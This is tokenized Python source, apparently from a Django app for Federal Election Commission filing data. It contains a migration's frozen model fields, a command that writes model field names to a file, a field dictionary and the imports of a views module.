'<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:4>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:2>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> import datetime <EOL> from django . core . management . base import BaseCommand , CommandError <EOL> from formdata . db_worker_settings import FIELDDIR_LOCATION <EOL> from formdata . models import * <EOL> def list_db_fields_from_model ( this_model ) : <EOL> """<STR_LIT>""" <EOL> field_list = [ ] <EOL> for field in this_model . _meta . fields : <EOL> if not field . auto_created : <EOL> field_list . append ( field . column ) <EOL> return sorted ( field_list ) <EOL> class Command ( BaseCommand ) : <EOL> help = "<STR_LIT>" <EOL> requires_model_validation = False <EOL> def handle ( self , * args , ** options ) : <EOL> fields = { } <EOL> fields [ '<STR_LIT:A>' ] = list_db_fields_from_model ( SkedA ) <EOL> fields [ '<STR_LIT:B>' ] = list_db_fields_from_model ( SkedB ) <EOL> fields [ '<STR_LIT:E>' ] = list_db_fields_from_model ( SkedE ) <EOL> fields [ '<STR_LIT:O>' ] = list_db_fields_from_model ( OtherLine ) <EOL> timestamp = datetime . datetime . now ( ) . strftime ( '<STR_LIT>' ) <EOL> field_def_file = open ( FIELDDIR_LOCATION , '<STR_LIT:w>' ) <EOL> field_def_file . write ( "<STR_LIT>" % timestamp ) <EOL> field_def_file . write ( "<STR_LIT>" % str ( fields ) ) <EOL> field_def_file . close ( ) </s>
<s> fields = { '<STR_LIT:A>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT:B>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT:E>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT:O>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } </s>
<s> import datetime <EOL> from django . shortcuts import get_object_or_404 , render_to_response <EOL> from django . db import connection <EOL> from django . db . models import Q <EOL> from django . template import RequestContext <EOL> from django . shortcuts import redirect <EOL> from django . contrib . localflavor . us . us_states import US_STATES <EOL> from django . db . models import Sum <EOL> from django . http import Http404 <EOL> from fec_alerts . models import new_filing , newCommittee , f1filer <EOL> from summary_data . models import Candidate_Overlay , District , Committee_Overlay , Committee_Time_Summary , Authorized_Candidate_Committees , Pac_Candidate , DistrictWeekly <EOL> from shared_utils . cycle_utils import get_cycle_abbreviation , is_valid_four_digit_string_cycle , get_cycle_endpoints , list_2014_only , list_2016_only , cycle_fake <EOL> this_cycle = '<STR_LIT>' <EOL> this_cycle_start = datetime . date ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> from formdata . models import SkedA , SkedB , SkedE <EOL> from summary_data . utils . summary_utils import map_summary_form_to_dict <EOL> from django . conf import settings <EOL> from summary_data . utils . update_utils import get_update_time <EOL> from summary_data . utils . weekly_update_utils import get_week_number , get_week_start , get_week_end <EOL> from summary_data . election_dates import elections_by_day <EOL> from summary_data . management . commands . write_weekly_files import data_series as weekly_dump_data_series <EOL> from summary_data . utils . chart_reference import chart_name_reference , chart_donor_name_reference <EOL> from django . views . decorators . cache import cache_page 